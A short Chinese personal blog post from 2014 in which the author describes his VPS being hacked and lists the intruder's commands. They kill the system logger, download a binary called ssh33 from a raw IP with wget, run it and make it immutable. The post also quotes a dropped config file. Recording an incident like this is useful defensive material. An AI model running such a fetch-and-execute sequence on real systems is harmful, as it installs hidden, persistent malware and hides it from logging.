Back

服务器被黑了(my VPS was hacked)

发布时间: 2014-06-30 22:19:00

自己的两台服务器昨天和今天早上都被福建的一个IP给黑了。 在1号服务器上他没做什么, 在2号服务器上他做的内容是:

killall -9 rsyslogd
wget http://96.44.185.98:8080/ssh33
chmod +x ssh33
./ssh33
chattr +i ssh33

我没有搜到 ssh33 这货是啥,唯一看到的是 里面最后一行有20W个字符。包括了各种CPP啥东东,见附件。 我估计是个后门脚本。

还在home 目录下多了一个 fack.cfg ,不知道是啥,内容是:

  1 0
  2 106.186.19.250:106.186.19.250
  3 10000:60000
  4 -59

/var/logs/kern.log 下面多了一行:  

 20 Jul  1 00:56:29 li539-250 kernel: imklog 5.8.6, log source = /proc/kmsg started.

Back